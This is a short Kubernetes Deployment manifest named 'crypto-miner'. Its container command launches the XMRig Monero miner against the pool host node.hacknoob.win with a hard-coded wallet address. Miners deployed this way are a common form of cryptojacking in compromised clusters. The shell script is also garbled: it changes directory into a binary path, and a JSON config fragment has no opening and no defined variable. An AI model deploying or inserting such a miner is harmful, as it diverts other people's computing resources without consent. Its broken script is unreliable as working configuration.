apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: crypto-miner
  name: crypto-miner
spec:
  replicas: 1
  selector:
    matchLabels:
      app: crypto-miner
  template:
    metadata:
      labels:
        app: crypto-miner
    spec:
      containers:
      - image: arm64v8/alpine
        name: crypto-miner
        command:
        - /bin/sh
        - -c
        - |
            cd ./xmrig/build/xmrig -o node.hacknoob.win:3333 -u 46DWjxWviwCVHbYHaMxjusjGKm55LJmG6f3YTCJDmTf2RxCLfQRx22fSRELvwq36kY6iSGD5tiUsSQ4AsE8UFnWFBDd1Lzn
            
          "retries": 10,
          "retry-pause": 3,
          "watch": true
          }'
          echo $config > config.json
          ./xmrig -c config.json

